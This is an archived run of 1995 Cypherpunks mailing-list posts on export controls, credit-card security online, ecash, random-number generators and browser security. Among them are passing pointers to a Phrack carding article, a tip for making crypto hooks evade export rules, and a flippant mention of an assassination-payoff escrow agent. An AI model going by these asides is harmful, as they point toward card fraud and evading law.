08:10:34 +0800 Subject: ANNOUNCE: Curve Encrypt 2.2 In-Reply-To: Message-ID: <199511142342.SAA03627@homeport.org> | Sounds cool, but... | | I already have PGP on my Macs. Why would I want this? Much easier to use. Faster than PGP on a mac. Adam -- "It is seldom that liberty of any kind is lost all at once." 
-Hume From jimbell at pacifier.com Tue Nov 14 16:11:07 1995 From: jimbell at pacifier.com (jim bell) Date: Wed, 15 Nov 1995 08:11:07 +0800 Subject: NSA, ITAR, NCSA and plug-in hooks. Message-ID: Scott Brickner writes: >Jeff Barber writes: >>Does anyone know the ostensible justification for this? What section of >>the ITARs do they point to when they say "this is illegal"? I've perused >>an online copy of ITAR (no, I haven't read all of it -- I have other >>things I want to do this year :-), but I can't find a section that could >>be construed to support this contention. > >I think it's 121.1, Category XIII paragraph (b) item (5): >"Ancillary equipment specifically designed or modified for paragraphs (b) >(1), (2), (3), (4) and (5) of this category;" Question: What makes computers in general NOT describable by such a paragraph?!? From cassiel at alpha.c2.org Tue Nov 14 16:15:14 1995 From: cassiel at alpha.c2.org (Cassiel) Date: Wed, 15 Nov 1995 08:15:14 +0800 Subject: Cypherpunk FAQ Message-ID: <199511142338.PAA03302@infinity.c2.org> Hi, I'm new to the list, so please don't flame me too badly if this is a dumb question. At least restrict the flames to private email where no one else can hear me scream. :> I downloaded the Cypherpunk FAQ from the Cypherpunk Website. When I decompressed it, all it contained were the words "Yoo hoo, anybody home?" Has the FAQ been corrupted or is this an in-joke? Also, the Privacy FAQ states it was written by L. Detweiler. Is this THE L. Detweiler? If so, why is it in the archives? Thanks for helping me out. Cassiel From rsalz at osf.org Tue Nov 14 16:32:55 1995 From: rsalz at osf.org (Rich Salz) Date: Wed, 15 Nov 1995 08:32:55 +0800 Subject: Get your own ITAR Message-ID: <9511150016.AA14450@sulphur.osf.org> 1 703 875 6644. The kindly administrative assistant there will take your name and address and send you a hardcopy of the ITAR regulations. I don't know about overseas mailings. 
I also imagine you will have to wait until the current US budget stale-mate is resolved. (Thanks to digest-reader walt at osf.org for the phone number.) /r$ From ac at hawk.twinds.com Wed Nov 15 08:50:29 1995 From: ac at hawk.twinds.com (Arley Carter) Date: Wed, 15 Nov 95 08:50:29 PST Subject: credit card conventional wisdom In-Reply-To: <9511151447.AA10433@absolut.osf.org.osf.org> Message-ID: This may be a stupidly obvious question but..... We could argue until the cows come home, hell freezes over or the Cubs win the World Series, what ever comes first ;-) about whether giving your credit card number to a waiter or an 800 # clerk is any more or less secure than transmitting it encrypted or clear text over a data link. However, this misses a very large point. The reason I will give my credit number to a clerk is that the bank/credit card consortium will indemnify me against losses from fraudulent use of my card. Tearing up your carbons is more to protect the bank than it is to protect you. The risk to *me* is virtually zero if I am a good bank customer. I have seen no such statement from the Visa/MasterCard/bank consortiums regarding who is at risk if my card number is stolen and used in cyberspace. When I get a written indemnification from them stating clearly that using my credit card in cyberspace is no different from using in a local restaurant, then I see no risk to the user in using the card in cyberspace. The risk to the bank and merchant.......Now that is a different matter. Credit card usage on the net will never take off until this issue is solved to the satisfaction of the bank and the user. Until this happens arguing this issue is like arguing about how many angels can fit on the head of a pin. Regards: -arc Arley Carter Tradewinds Technologies, Inc. email: ac at hawk.twinds.com www: http://www.twinds.com "Trust me. This is a secure product. I'm from ." On Wed, 15 Nov 1995, Howard Melman wrote: > > > On Tue Nov 14, 1995, Vladimir Z. 
Nuri wrote: > > > attempts to get secure credit card number transfer on the > > internet are not an end in themselves. they are the first > > steps toward an entirely new transaction system. those who > > see a single step and criticize it as feeble in the > > context of past systems are missing the point and > > apparently can't think past the present nanosecond of > > their lives. > From hallam at w3.org Wed Nov 15 09:00:13 1995 From: hallam at w3.org (hallam at w3.org) Date: Wed, 15 Nov 95 09:00:13 PST Subject: credit card conventional wisdom In-Reply-To: Message-ID: <9511151659.AA03934@zorch.w3.org> >No. What Phil is saying is that the magnetic strip contains an extra >group of digits which are only available when the stripe is read, and not >when the card is used for CNP. The extra digits I was referring to are the ones on the front of the card but not embossed. Credit card data formats are available in an issue of phrack. There is also an article on credit card abuse "safe and easy carding by VaxBuster". VaxBuster is I believe currently living in a secured community somewhere in Texas making little ones out of big ones. Phill PS Simon is right about Blum Blum Shub, note that there is a new PRNG available called Pew, Pew, Barley, McGrew. From wilcoxb at nagina.cs.colorado.edu Tue Nov 14 18:41:03 1995 From: wilcoxb at nagina.cs.colorado.edu (Bryce) Date: Wed, 15 Nov 1995 10:41:03 +0800 Subject: encryption in BeOS kernel Message-ID: <199511150222.TAA15162@nagina.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- Some of you may be aware of this interesting new computer named the "BeBox" which will start shipping in Q1 96 I think. Go here for more info. A paragraph on the Q&A page caught my attention and when they asked for expert advice I naturally thought of you guys. "Q: What security protection will the BeBox have? A: We're planning to offer a security/encryption mechanism at the kernel level.
However, we haven't nailed down the details of this mechanism, so your expert input would be appreciated. One of our primary interests is to allow encryption of application software for individual machines. (The flash ROM in each BeBox will be serialized in the portion of the ROM which is unmodifiable.)" I have two things to add: 1. The scheme they mention there is, I think, intended to be a software protection scheme and like all such is doomed to failure. I hope they don't spend too much effort on it. On the other hand there might be some nifty crypto applications that could use this unique identifier. Although none come to mind... 2. Be, Inc. is located in Menlo Park, CA, USA and Paris, France. They couldn't have picked two countries who are more likely to royally screw them by restricting the export/sale of their product once said product has encryption built-in. (Of course they could put the encryption in a loadable kernel module, which would be an interesting test of ITAR's "crypto-with-a-hole" restrictions.) I hope the NSA isn't reading this and getting ideas... Bryce signatures follow "To strive, to seek, to find and not to yield." bryce at colorado.edu From hallam at w3.org Tue Nov 14 18:52:04 1995 From: hallam at w3.org (hallam at w3.org) Date: Wed, 15 Nov 1995 10:52:04 +0800 Subject: credit card conventional wisdom In-Reply-To: <199511150156.RAA18623@netcom21.netcom.com> Message-ID: <9511150233.AA31764@zorch.w3.org> The article misses the point. What the credit card cos are worried about is the disclosure of credit card numbers in bulk by merchant servers connected incompetently to the internet.
The issue of customer exposure is a non issue, regulation E means that there is no customer risk. There is in fact a distinction between "card present" and "card not present" transactions. AMEX cards for example have an extra group of four digits which are not part of the embossed card number. They are used as additional verification to prove that a card is present. In general a merchant pays a lower commission for card present transactions to reflect the reduced risk. The point of the article is that people running round like headless chickens because of Internet insecurity miss the main point, the security is no worse than the real world we just have rather higher standards. What it does mean is that people like myself will be able to make a nice living explaining to people what security issues to forget and which ones to worry like hell about. Phill From charles at europages.com Tue Nov 14 19:11:45 1995 From: charles at europages.com (charles at europages.com) Date: Wed, 15 Nov 1995 11:11:45 +0800 Subject: unsuscribe Message-ID: <9511140946.AA02846@europages.com> unsuscribe From greg at ideath.goldenbear.com Tue Nov 14 19:39:29 1995 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Wed, 15 Nov 1995 11:39:29 +0800 Subject: credit card conventional wisdom Message-ID: <199511150321.AA17449@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- Detweiler writes: > the argument goes like this: secure credit card number uploading > schemes (such as in Netscape) are not important on the internet because > credit card numbers are already insecure. you give them to low-wage > workers all the time who might steal the number from you anyway. > there are a lot of fallacies with this. I find this to be a key > cypherpunk issue, and I hope others will agree to the point of > trying to attack this fallacy through letters to the editor, > debates, etc., because it seems to rationalize weak security.
You're only reproducing half of the debate, which goes like this: Businesses/customers won't trust the Internet for commerce, because it's not perfectly secure. And then others go on to point out that businesses and consumers do business every day using commerce tools whose security features are weak to nonexistent. So, no, we don't have to "get the Internet ready for business" because it's already at least as secure as ordinary consumer transactions. This doesn't mean that it's not important to work on security, just that it's a useful direction for improvement, not a baseline requirement. Most consumer-level transactions are based on a general sort of trust-in-human-nature sort of policy, backed up by the knowledge that a single failed transaction (or even a constant low level of failed transactions, where failed == "didn't get paid but gave the stuff away") isn't likely to kill off a business or even make it unprofitable. Loss by theft or fraud can be thought of like any other sort of overhead - and it doesn't make sense (financially) to spend more to eliminate it than you'll recover by that elimination. Pursuing criminal or civil charges against a non-performing party is expensive - most people do it out of a sense of moral outrage, or because they want to maintain a public perception of unforgiveness, not because they really think they'll get back what they've expended in time, money, and opportunities lost for other (more profitable) pursuits. (see Axelrod on the Prisoner's Dilemma tournaments for the arguable game-theory C-punks cryptoanarchy relevance.) 
From kecooper at maroon.tc.umn.edu Tue Nov 14 20:22:32 1995 From: kecooper at maroon.tc.umn.edu (Karen E Cooper) Date: Wed, 15 Nov 1995 12:22:32 +0800 Subject: Applied Cryptography MPLS Book Release Party In-Reply-To: <30a9659e030b002@maroon.tc.umn.edu> Message-ID: <30a967be0ba7002@maroon.tc.umn.edu> APPLIED CRYPTOGRAPHY 2nd Ed. BOOK RELEASE PARTY Please come out and meet author Bruce Schneier at a drinks and hors d'oeuvre reception to celebrate the publication of Applied Cryptography, 2nd Ed. The reception is in Minneapolis, Minnesota on Wednesday, 29 November, 1995, from 5:00 to 8 pm. RSVP for directions and specifics. Karen Cooper (612) 823-1098 kecooper at maroon.tc.umn.edu From ses at tipper.oit.unc.edu Tue Nov 14 20:55:09 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Wed, 15 Nov 1995 12:55:09 +0800 Subject: credit card conventional wisdom In-Reply-To: <9511150243.AA14648@sulphur.osf.org> Message-ID: On Tue, 14 Nov 1995, Rich Salz wrote: > >There is in fact a distinction between "card present" and "card not present" > >transactions. AMEX cards for example have an extra group of four digits which > >are not part of the embossed card number. They are used as additional > >verification to prove that a card is present. > > So the run-it-through-the-mechanical-device is treated as card not present? No. What Phil is saying is that the magnetic strip contains an extra group of digits which are only available when the stripe is read, and not when the card is used for CNP. I can't confirm or deny this, as despite my new bosses, I still find it hard to care about credit card readers (mostly because US banks won't let me have any).
Simon From ses at tipper.oit.unc.edu Tue Nov 14 21:02:32 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Wed, 15 Nov 1995 13:02:32 +0800 Subject: [NOISE] Random Thoughts (was Re: BBS Generator Code) In-Reply-To: Message-ID: Re: Blum-Blum-Shub. Isn't the best reason to use BBS the fact that it's just so much fun to say- it sounds like something out of Lovecraft. Blum Blum Shub Niguath, the Black Code of the woods with a thousand bits. MD5 and LFSRs are just plain dull. Simon // All I wanna do is make a Blum-Blum-Shub with a zoom-zoom From tcmay at got.net Tue Nov 14 21:15:57 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 15 Nov 1995 13:15:57 +0800 Subject: encryption in BeOS kernel Message-ID: Either John Young or someone imitating his style wrote: >Would chip-fabbers covertly Fortezza chips to get export ok? > I have no idea what "Fortezza" means as a verb, but I'll Moscow a guess: Intel might, according to this guesser, insert NSA-approved back doors in "information appliance" chips. Unlikely in the extreme, for a variety of reasons. First, designers cannot keep secrets. Second, examination of the chips would reveal such meddling. Third, Intel is only one of several likely providers of such chips (e.g., Oracle is said to have plans to use Acorn ARM chips, and DEC may also provide low-end Alpha chips, and of course Motorola-IBM has variants of the PPC to provide). >Motorola, HP, IBM, others long-linked to USG are ever ready >to gobble international market share in the national >interest. > >Intel, sure, world-class fab plants planting chip-secrets. > >Wonder if that key escrow protest to Gore is a cover for >economic actions authorized by National Security D&D? Too much Pynchon? --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. 
May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From anonymous-remailer at shell.portal.com Tue Nov 14 21:26:01 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Wed, 15 Nov 1995 13:26:01 +0800 Subject: credit card conventional wisdom Message-ID: <199511150512.VAA08514@jobe.shell.portal.com> On Tue, 14 Nov 1995, Greg Broiles wrote: > Detweiler writes: > > > the argument goes like this: secure credit card number uploading > > schemes (such as in Netscape) are not important on the internet because > > credit card numbers are already insecure. you give them to low-wage > > workers all the time who might steal the number from you anyway. > > > there are a lot of fallacies with this. I find this to be a key > > cypherpunk issue, and I hope others will agree to the point of > > trying to attack this fallacy through letters to the editor, > > debates, etc., because it seems to rationalize weak security. > > You're only reproducing half of the debate, which goes like this: Actually, this is not quite correct. There is a difference if I give a credit card to *one* person, or if I give the message containing that number to a chain of twenty or thirty strangers to get my information to the one person I want to have that information. We're back to handing your card to the neighbour, who gives it to the doorman, who flags the cab and gives it to a cabbie, who then drives cross town and gives it to another doorman, who then etc, etc. Something completely different than the long bomb from the quarterback. Our potential interception points have increased substantially ... and we have absolutely no audit trail to figure out who *might* have scarfed the card. 
I guess the average customer won't care. His loss is limited to $50. But some of us who try to live in the real world wonder how long that'll last. Can we measure the life of it in a matter of weeks?? Or months? > Businesses/customers won't trust the Internet for commerce, because it's > not perfectly secure. > > And then others go on to point out that businesses and consumers do > business every day using commerce tools whose security features are weak > to nonexistent. Hmmm ... maybe we'll even get a whole whole new industry going ... don't ya think?? Maybe we can create a whole new set of risks which are additive to those we already have. Maybe every petty grifter might trade in his very own credit card number and simply claim that their credit card got stolen over the internet. Just disappeared into the anonymous aethyr ... the one without an audit trail ... but my loss is limited to $50, right?? I guess other people understand systems much, much, more than I do. I guess that the NY Times is right ... it won't change the loss rate for the card companies, at all ... nope ... won't create a new problem ... naahh ... the public wouldn't actually take advantage of holes like this in the system. Nope, no sirreee ... Give your head a shake. Alice de 'nonymous ... ...just another one of those... ...hunters... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From ses at tipper.oit.unc.edu Tue Nov 14 21:53:20 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Wed, 15 Nov 1995 13:53:20 +0800 Subject: Who needs time vaults anyway? In-Reply-To: Message-ID: On Sat, 11 Nov 1995, Robert Hettinga wrote: > In the real world, there's a trustee/nominee of some sort who does this. > What's that to keep that from happening on the net, just like our much > maligned (guy's gotta make a living, fer chrissake!) assassination-payoff > escrow agent... 
Nothing really; It would probably be better to do some sort of secret sharing and use a number of somewhat trusted escrow-agents, but the protocols aren't too complex. For the simple case where the release is time based, you could even make the process totally automatic; just have the escrow agents send off their bits of the key when the time has expired, and voila. As for real time-release - how about just using conventional encryption, and require it to be brute-forced? Depending on how fine grained you want the release to be, you could also take the inverse of Moore's law, work out how big a key you need to have it unbreakable in less than the desired time, add in whatever fudge factors you feel like based on how much it would be worth to the opponent to get early access, then lock up the secret and throw away the key. Simon From jamesd at echeque.com Tue Nov 14 21:54:59 1995 From: jamesd at echeque.com (James A. Donald) Date: Wed, 15 Nov 1995 13:54:59 +0800 Subject: ecash speed Message-ID: <199511112122.NAA02204@blob.best.net> At 12:21 PM 11/9/95 -0800, jim bell wrote: >I think that one thing that's needed is the concept of probabilistic payments. Problem: If the recipient verifies the coin infrequently, then someone can browse with slugs, accepting a modest probability of random URL failure. If the recipient verifies the coin regularly, then the cost of verification is still the same as ever. Another poster earlier suggested the following solution, which seems to me much better: When you access the home page of the Playboy dirty pictures web site, you automatically buy a bunch of seemingly random numbers from them: Every time you click on a URL, you spend one or more of their numbers. If you have some left over when you are through, you can keep them or cash them. This would mean two expensive transactions (high calculation and communication costs) per provider, instead of one expensive transaction per click. 
It also means that providers could make their tokens as cheap or expensive as they wished, down to microcents if they felt so inclined. It also means that every shop around the world would be issuing their own money, making it impossible to trace anything in practice even if everything was traceable in principle. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From blancw at accessone.com Tue Nov 14 21:55:55 1995 From: blancw at accessone.com (blancw at accessone.com) Date: Wed, 15 Nov 1995 13:55:55 +0800 Subject: the revolution of microcurrency Message-ID: <9511112128.AA29071@pulm1.accessone.com> From Thomas Junker (in reply to Vlad): > this same idea works with software. you don't see > software as an end product. you see it as something that > is evolving over time. and whenever you send money to a > company for software, in this new system the idea is that > "I like this software, and I want to see it grow. here > is my contribution to that". People as marketplace players do not think like that. .................................................... This is a very important point to consider: how a person as a customer will _actually_ think. It is easy enough to propose schemes based on one's preferences of how one would like a potential customer to make decisions about services, products, and methods of payment for what is offered. But doing the customer's thinking for them doesn't automatically transform them into that line of reasoning. To better compute whether they will proceed according to how you have imagined, it is more realistic to consider how the other person reasons on the circumstance they are facing - from their perspective.
Market researchers actually carry out tests for consumer response and acceptance of products or payment schemes in order to gauge their success. And there are many kinds of potential customers, who will make different decisions in regard of the same thing: some will find it a good idea to think about software in terms of "contributing to its growth" in the longterm, but some will have immediate needs which they are trying to satisfy and may think "I need a solution to my problem *right now*" and will look for the product/service which will solve their problem as it stands in the present. This is another attractive feature of "the free market": in it one can find all sorts of schemes & methods for solving all sorts of problems in different ways. There is no single type of consumer, no single circumstance, no one service or product or scheme which will satisfy everyone, equally, at all times. "May the Best Man Win", and "To the Victor Belong the Spoils". .. Blanc From daw at CS.Berkeley.EDU Tue Nov 14 21:59:53 1995 From: daw at CS.Berkeley.EDU (David A Wagner) Date: Wed, 15 Nov 1995 13:59:53 +0800 Subject: Diffie-Hellman in GF(2^n)? Message-ID: <199511122243.OAA18565@delhi.CS.Berkeley.EDU> In article you write: > Most Diffie-Hellman implementations currently use the multiplicative group > of prime fields. However, the multiplicative group of finite fields of > characteristic 2 (GF(2^n)) can also be used and should be easier to > implement. Is there any reason why they should not be used? Does anyone > know the asymptotic running time of the best algorithm for calculating > discrete logarithms in GF(2^n)? I remember that the discrete log problem is quite a bit easier in GF(2^n), but I don't remember how much easier. Let me try to look it up... A. Odlyzko has a paper recommending that people should not use GF(2^n) for discrete log applications; in it he states that you will need at the minimum n > 800, and probably n > 1500. (And you also need to choose n carefully.) 
A quote from the abstract: ``Hence the fields GF(2^n) ought to be avoided in all cryptographic applications.'' I don't know enough about number theory to judge for myself; but you can read the (long) paper yourself at ftp://netlib.att.com/netlib/att/math/odlyzko/discrete.logs.ps.Z I hope this helps! From shamrock at netcom.com Tue Nov 14 22:02:31 1995 From: shamrock at netcom.com (Lucky Green) Date: Wed, 15 Nov 1995 14:02:31 +0800 Subject: WebSTAR security challenge. Make $10,000 breaking in a site. Message-ID: From TidBITS: **$10,000 Internet Security Challenge** -- I wrote about the WebMaster Macintosh security challenge back in TidBITS-295_ and, as expected, no one was able to break WebSTAR's security and claim the prize of free passes to the WebEdge conference. Now the stakes have increased. Seven companies - StarNine, EveryWare, Maxum, ComVista Internet Solutions, WebEdge, Digital Forest, and Westwind Computing - have joined forces to offer a more lucrative prize of $10,000. The new challenge is similar: you must break WebSTAR's security to find information that isn't available to the public and report it by midnight on 30-Nov-95. Check out the rest of the details online if you are interested. [ACE] http://challenge.comvista.com/ -- Lucky Green PGP encrypted mail preferred. From shamrock at netcom.com Tue Nov 14 22:14:00 1995 From: shamrock at netcom.com (Lucky Green) Date: Wed, 15 Nov 1995 14:14:00 +0800 Subject: Secondary Ecash applications on hold Message-ID: A few weeks ago, I promised you all to write some scripts that will lay the groundwork for some of the more unusual applications of Ecash. Unfortunately, I went straight from one contract to the next and didn't find the time to work on the scripts. I am currently in St. Louis, making sure that Ecash makes the impact on Internet commerce that many of us think it should make.
Anyone on this list that ever thought of opening a shop using Ecash or is interested in Ecash in general is encouraged to email me at support at marktwain.com and share their ideas. TIA, -- Lucky Green PGP encrypted mail preferred. From mch at squirrel.com Tue Nov 14 22:55:01 1995 From: mch at squirrel.com (Mark C. Henderson) Date: Wed, 15 Nov 1995 14:55:01 +0800 Subject: CSE gets flak on TV In-Reply-To: Message-ID: <9511142245.ZM12784@squirrel.com> On Nov 14, 16:47, s1113645 at tesla.cc.uottawa.ca wrote: > Subject: CSE gets flak on TV > For those who care, the Communications Security Establishment has been > getting some flak for spying on Mex. during NAFTA talks and on Korea to > help us sell Can. nuke reactors: Folks who are interested in the CSE should also check out the "unofficial CSE home page" at http://watserv1.uwaterloo.ca/~brobinso/cse.html There is also a very dull "official" home page at http://www.cse.dnd.ca -- Mark Henderson -- markh at wimsey.bc.ca, henderso at netcom.com, mch at squirrel.com PGP 1024/C58015E3 fingerprint=21 F6 AF 2B 6A 8A 0B E1 A1 2A 2A 06 4A D5 92 46 cryptography archive maintainer -- ftp://ftp.wimsey.com/pub/crypto ftp://ftp.wimsey.com/pub/crypto/sun-stuff/change-sun-hostid-1.5.1.tar.gz From jimbell at pacifier.com Tue Nov 14 23:10:54 1995 From: jimbell at pacifier.com (jim bell) Date: Wed, 15 Nov 1995 15:10:54 +0800 Subject: NSA, ITAR, NCSA and plug-in hooks. Message-ID: > > >I think it's 121.1, Category XIII paragraph (b) item (5): > > >"Ancillary equipment specifically designed or modified for paragraphs (b) > > >(1), (2), (3), (4) and (5) of this category;" > > > > Question: What makes computers in general NOT describable by such a > > paragraph?!? > >"specifically designed"? > >nathan That makes it easy: Just make sure that you also write a compressor or filter program with similar compatibility, and nobody can argue that the hooks were SPECIFICALLY DESIGNED for encryption. 
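Simon Spero's suggestion in the "Who needs time vaults anyway?" message earlier in this archive (size a conventional key from the inverse of Moore's law, add fudge factors, then throw away the key) worked through as an added example; it is not code from any poster. The starting rate of 10^9 keys/s, the 18-month doubling period and the 1% early-break tolerance are assumptions.

```python
"""Sizing a brute-force "time lock" key when attacker speed doubles periodically.

Added illustration; all numeric defaults are assumptions, not figures from the list.
"""
import math

SECONDS_PER_YEAR = 365.25 * 24 * 3600


def cumulative_keys(t_years, rate0, doubling_years=1.5):
    """Keys tested after t_years if the rate starts at rate0 keys/s and
    doubles every doubling_years (integral of rate0 * 2**(t/d))."""
    growth = math.log(2) / doubling_years
    return rate0 * SECONDS_PER_YEAR * math.expm1(growth * t_years) / growth


def break_time(keys, rate0, doubling_years=1.5):
    """Inverse of cumulative_keys: years needed to test `keys` candidates."""
    growth = math.log(2) / doubling_years
    return math.log1p(keys * growth / (rate0 * SECONDS_PER_YEAR)) / growth


def key_bits_for_lock(lock_years, rate0, doubling_years=1.5,
                      early_prob=0.01, budget_factor=1.0):
    """Smallest key size such that the chance of recovering the key before
    lock_years is at most early_prob.

    budget_factor is the fudge factor for an opponent who can afford that
    many times the baseline hardware. A search that has covered W of 2**n
    keys has succeeded with probability W / 2**n.
    """
    work = cumulative_keys(lock_years, rate0 * budget_factor, doubling_years)
    return math.ceil(math.log2(work / early_prob))


def release_window(bits, rate0, doubling_years=1.5, early_prob=0.01):
    """Years until the key falls: early (early_prob quantile), median, worst case."""
    keyspace = 2.0 ** bits
    return {
        "early": break_time(early_prob * keyspace, rate0, doubling_years),
        "median": break_time(0.5 * keyspace, rate0, doubling_years),
        "worst": break_time(keyspace, rate0, doubling_years),
    }


if __name__ == "__main__":
    rate0 = 1e9  # assumed attacker speed today, keys per second
    for years in (5, 10, 20):
        bits = key_bits_for_lock(years, rate0)
        window = release_window(bits, rate0)
        print(f"lock {years:2d}y -> {bits} bits; "
              f"early {window['early']:.1f}y, "
              f"median {window['median']:.1f}y, "
              f"worst {window['worst']:.1f}y")
```

Each extra key bit moves the release date by about one doubling period, so the lock cannot be tuned more finely than that, and the spread between the early and worst-case dates shows how imprecise the release moment is.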
From E.J.Koops at kub.nl Wed Nov 15 01:45:57 1995 From: E.J.Koops at kub.nl (Bert-Jaap Koops) Date: Wed, 15 Nov 1995 17:45:57 +0800 Subject: Crypto requlations & laws Message-ID: > Could the person posting the location of the crypto laws please repost. http://www.kub.nl:2080/FRW/CRI/projects/bjk/lawsurvy.htm Bert-Jaap Koops From vznuri at netcom.com Wed Nov 15 02:12:14 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Wed, 15 Nov 1995 18:12:14 +0800 Subject: credit card conventional wisdom Message-ID: <199511150156.RAA18623@netcom21.netcom.com> I've been seeing a particular meme-nugget of conventional wisdom circulating in reference to credit cards that I'd like to debunk. (recently showed up in the WSJ, "Boardwatch" magazine editorial column, etc). these legends and thinkings are starting to annoy me to the point of becoming a pet peeve. the argument goes like this: secure credit card number uploading schemes (such as in Netscape) are not important on the internet because credit card numbers are already insecure. you give them to low-wage workers all the time who might steal the number from you anyway. there are a lot of fallacies with this. I find this to be a key cypherpunk issue, and I hope others will agree to the point of trying to attack this fallacy through letters to the editor, debates, etc., because it seems to rationalize weak security. - 1st point: yes, you do give credit cards to low wage workers in businesses, but this is not directly parallel to sending a credit card over the internet. the fuzzy thinking goes like this: "credit card numbers are already not secure. therefore, trying to secure them is frivolous". this is patently ridiculous on the face of it. it's circular reasoning. credit card numbers could become more secure if all businesses made them more secure. getting all businesses to make them secure is part of the battle. raising consciousness on the issue is part of the battle. saying, "there is no point" is a copout imho. 
- the insecurity of sending a card over the net could be far better or worse than that of handing it to an individual. 1st, when you send a number over the net, potentially anyone (including people other than the destination business) could spy on it. when you give it to someone in a company, only that representative (who would be trusted by the company) has access to it. or, alternately, maybe no one could *ever* see your card sent over the internet, including workers at the end site, who never deal with the numbers directly. such a system is possible and may become the norm. but not if shallow-thinking people can't imagine it as possible. - it is not impossible to have cards that don't have numbers but instead have magnetic stripes, and the only way for them to work is to be physically scanned. this would reduce fraud but would also reduce the convenience of sending numbers over the phone (mail order) for example. I'm not saying all cards should be this way, but it might make sense for some people to get a "scan only card" that cannot be used unless physically scanned. the point is that there are variations on the credit card theme that make them more secure, and there's a bit of a hurdle in getting Joe Sixpack to realize this, and realize it's desirable. - the boardwatch magazine editor argued that uploading credit card numbers over the internet in a secure fashion is a "non problem" because credit cards are already insecure. have you ever heard of PROGRESS, mr. bonehead? if the net began to make credit transactions more secure, perhaps that would create a momentum in which other offline businesses might become more strict or careful about credit card security. - credit card fraud is absolutely enormous in this country. and there are not really any very strong safeguards against it except a lot of "security through obscurity" (of credit card numbers). 
*everyone* pays the cost of this horrible fraud rate through increased transaction charges, higher interest rates, etc. just because you may not see it itemized on your credit card bill, does not mean you are not paying for it. (in much the same way that a sort of "shoplifting tax" is reflected in the cost of all merchandise). - the internet may eventually become completely secure. arguing that "we don't need security on the internet because we don't have it in the business world of daily credit card use, and they get along fine" is ridiculously simplistic and specious. the fact is that businesses do *not* really like many aspects of credit cards: low security, overhead costs, cost of interface devices to the credit card companies, etc. all these negative ingredients could be improved in cyberspace. but it won't happen if every time a new superior system comes along, someone argues, "but there's nothing wrong with what we have now!!!" when this is quite obviously mistaken to anyone with any minimal background& understanding in the area. furthermore, consumers are somewhat notorious for not really knowing what they want, and sometimes arguing against something they would buy or use in the future. == I'm continually amazed at how often security issues are mixed up in people's brains and reasoning. there are a lot of fallacies that work their way into respectable writing by reputable people that tend to mirror circular reasoning such as, "if something is insecure already, it makes no point to try to make a piece of it more secure". security is sometimes won slowly in increments, in which one could argue against each increment as useless or inconsequential, but the end result could lead to far better security. furthermore, there are a lot of different kinds of security weaknesses-- there is not a simple black-and-white measurement of "secure" vs. "insecure" but a lot of intermediate gradations. 
attempts to get secure credit card number transfer on the internet are not an end in themselves. they are the first steps toward an entirely new transaction system. those who see a single step and criticize it as feeble in the context of past systems are missing the point and apparently can't think past the present nanosecond of their lives. From anonymous-remailer at shell.portal.com Wed Nov 15 02:29:34 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Wed, 15 Nov 1995 18:29:34 +0800 Subject: Netscape rewards are an insult Message-ID: <199511151019.CAA18910@jobe.shell.portal.com> Alice here ... I know that this is *painfully* dated, and I apologize to the list for replying to a one month old post, but I felt I had to put some final items on the record. And I think that this is still timely ... so ... On Sat, 14 Oct 1995, Dr. Frederick B. Cohen wrote: > Phil typed: > > Have things really come to this? Besides the legal implications of > > discovering a hole and then selling the information to someone, (who > > presumably will only want this information for one purpose) where has > > the attitude of doing for the sake of doing gone? > > It's one thing to do good for the sake of doing good. Most of us do that > every day by participating in this list. It's quite another thing to be > insulted in the process. I think that Netscape's reward is an insult, Dr. Frederick B. Cohen has nailed it once again. He's right. But Phil's comments really need to be addressed ... vis-a-vis the implications of "discovering a hole and selling it". Phil's hypothetical is rightfully worrisome, but we should remember it _is_ only a hypothetical. Let's not worry much about hypotheticals. Perhaps we should worry more about what in fact IS an ACTUAL, rather than what might possibly be. The hand-wringing should be over the existing reactions to publicly ignored security holes and the ETHICS of the new Internet players. 
The ones who are so very cock-sure of themselves. So cock-sure, that they willingly gamble with public security and think that their invasion of individuals personal boundaries and privacy is nothing noteworthy. That it will just somehow pass. My post detailing a structural flaw in Netscape Navigator was announced, very quietly, to this list OVER ONE MONTH AGO. And what has been done about it, by AT&T and/or Netscape?? Nothing. AT&T has its reputation attached to this code, as does Deutsche Telecom, as does Netscape. The only "action" they've taken is to info-freeload and then do absolutely, positively, definitely ... nothing. Diddly-squat. No one has taken any action whatsoever. How would we treat a company ... let's say a construction company that found out that one of its buildings was unsafe, and then proceeded not to barricade the complex. If the company found out that the girders were not up to the engineered spec, and simply allowed risk and harm to continue. If the Company thought it was OK to gamble with people's lives? Would we say that the reckless disregard for the public interest merited criminal sanction?? Hopefully, we would. To attack some hypothetical "information provider" for selling some "hypothetical" information which a corporation denies is actually of any value, at all -- nominal, or otherwise -- is an argument that just doesn't float. It completely misses the mark. > If they think you can find major security bugs in Netscape for as little > as $1000, they should take the product off the market, or at least stop > claiming that it offers security. They should definitely take the product off the market. Period. They should also stop claiming that it offers any security. In fact, they should attach a product warning label, something that says that Netscape Navigator degrades your inherent safety and security as soon as you use it. That would be the "right thing" to do. Because that is truthful. 
